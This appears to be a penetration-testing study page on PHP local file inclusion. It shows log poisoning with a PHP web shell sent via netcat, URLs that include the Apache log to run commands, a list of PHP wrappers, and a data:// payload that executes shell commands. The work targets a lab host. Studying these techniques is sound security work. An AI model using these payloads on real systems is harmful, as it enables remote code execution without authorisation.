File Inclusion Vulnerabilty

Contaminating log files

Let's send that payload now:

kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

HTTP/1.1 400 Bad Request

Our payload should be found near the end of the log file:

10.11.0.4 - - [30/Nov/2019:13:55:12 -0500]
"GET /css/bootstrap.min.css HTTP/1.1" 200 155758 "http://10.11.0.22/menu.php?file=\\Windows\\System32\\drivers\\etc\\hosts" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.11.0.4 - - [30/Nov/2019:13:58:07 -0500] "GET /tacotruck.php HTTP/1.1" 200 1189 "http://10.11.0.22/menu.php?file=/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.11.0.4 - - [30/Nov/2019:14:01:41 -0500] ""<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>\n" 400 981 "-" "-"

We'll build a URL that includes the location of the log as well as our command to be executed (ipconfig) sent as the cmd parameter's value.

http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
http://10.11.0.22/menu.php?file=/var/log/apache2/logs/access.log&cmd=ifconfig

PHP wrappers

These are PHP wrappers:

file:// — Accessing local filesystem
http:// — Accessing HTTP(s) URLs
ftp:// — Accessing FTP(s) URLs
php:// — Accessing various I/O streams
zlib:// — Compression Streams
data:// — Data (RFC 2397)
glob:// — Find pathnames matching pattern
phar:// — PHP Archive
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — Audio streams
expect:// — Process Interaction Streams

Example of use:

http://10.11.0.22/menu.php?file=data:text/plain,hello world

Or a better payload for LFI:

http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

PreviousSQL Injection NextCommand Injection

Last updated 2 years ago

Was this helpful?